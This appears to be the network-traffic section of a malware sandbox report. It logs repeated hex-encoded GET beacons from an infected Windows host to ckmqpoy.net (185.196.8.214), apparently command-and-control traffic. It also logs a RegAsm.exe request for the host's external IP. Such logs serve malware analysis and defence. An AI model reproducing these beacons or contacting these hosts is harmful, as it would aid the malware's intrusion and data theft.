                                                                                                                                                                                                                                        Sep 21, 2024 14:50:05.290703058 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:05.926877022 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:05 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        47192.168.2.949820185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:06.162523985 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:06.973529100 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:06 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        48192.168.2.949821185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:07.227771997 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:07.916620970 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        49192.168.2.949822185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:08.208347082 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:08.874736071 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:08 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        50192.168.2.949823185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:09.302342892 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:09.959538937 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:09 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        51192.168.2.949824185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:10.303121090 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:10.962641001 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:10 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        52192.168.2.949825185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:11.253237009 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:11.927285910 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:11 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        53192.168.2.949826185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:13.062978983 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:13.730045080 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:13 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        54192.168.2.949827185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:14.029897928 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:15.583489895 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:14 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:15.583725929 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:14 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:15.584711075 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:14 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:15.585047960 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:14 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        55192.168.2.949828185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:15.828810930 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:16.500785112 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:16 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        56192.168.2.949832185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:19.155721903 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:20.418977022 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:19 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:20.419167995 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:19 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:20.422923088 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:19 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:20.536832094 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:20.782943010 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:20 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        57192.168.2.949834185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:20.923192024 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:21.603557110 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:21 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        58192.168.2.949836185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:21.737252951 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:22.443790913 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:22 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        59192.168.2.949837185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:22.571687937 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:23.262243032 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:23 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        60192.168.2.949839185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:23.404640913 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:24.104568005 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:24 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        61192.168.2.949841185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:24.249202967 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:24.935394049 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:24 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                        62192.168.2.949842185.196.8.21480
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:25.056140900 CEST318OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa19e8889b5e4fa9281ae978f771ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf918c2ed9c9239 HTTP/1.1
                                                                                                                                                                                                                                        Host: ckmqpoy.net
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                        Sep 21, 2024 14:50:25.745649099 CEST220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                                                                                                        Date: Sat, 21 Sep 2024 12:50:25 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.949707173.231.16.774437504C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-09-21 12:48:03 UTC202OUTGET /?format=json HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
